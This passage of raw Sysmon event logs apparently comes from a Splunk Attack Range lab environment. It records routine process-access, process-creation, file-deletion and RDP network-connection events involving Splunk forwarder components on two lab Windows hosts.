Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976540Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:27.218{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976539Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:27.218{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976538Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:27.218{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976537Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:27.218{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976536Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:27.218{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976535Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:27.218{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976534Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:27.218{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976533Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:27.218{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976532Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:27.218{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976531Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:27.218{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-8867-6151-7C79-00000000FD01}2540C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000976530Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:27.218{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8867-6151-7C79-00000000FD01}2540C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000976529Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:27.203{69CF5F33-8867-6151-7C79-00000000FD01}2540C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000976528Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:27.202{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0885F29335B7BF299485129A5E53EBD1,SHA256=68482E19680F69FDD0046BD674B5778AA16B5445BF9AC923DF7CE9A8731AFEE0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047986Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:25.395{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-52763-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001047985Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:27.404{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=18B94E058FCB40A8342DFB9C5B9470C7,SHA256=F4AF5195FD399FFF4B2BDCAB4ED6779BEBC5E74629A9B4B1171002D978836CF5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047984Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:27.404{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6DF1E31E43859439CE1E1D92B4935B18,SHA256=50C93AEAAFD4C77A0E9608A4970C4C697FA392501F792B8B010129821ACD6077,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047988Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:01:28.635{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84CD0ACF60C85C81B1E67ADF6440EF22,SHA256=03FDFCF32945A0902D5E0DD876F4B8A0A74F6B5FD756CBD318E95E15F7F95558,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000976571Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:28.593{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8868-6151-7E79-00000000FD01}3412C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976570Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:28.593{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976569Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:28.593{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976568Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:28.593{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976567Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:28.593{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976566Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:28.593{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976565Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:28.593{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976564Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:28.593{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976563Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:28.593{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976562Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:28.593{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8868-6151-7E79-00000000FD01}3412C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000976561Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:28.593{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976560Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:01:28.593{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8868-6151-7E79-00000000FD01}3412C:\Program 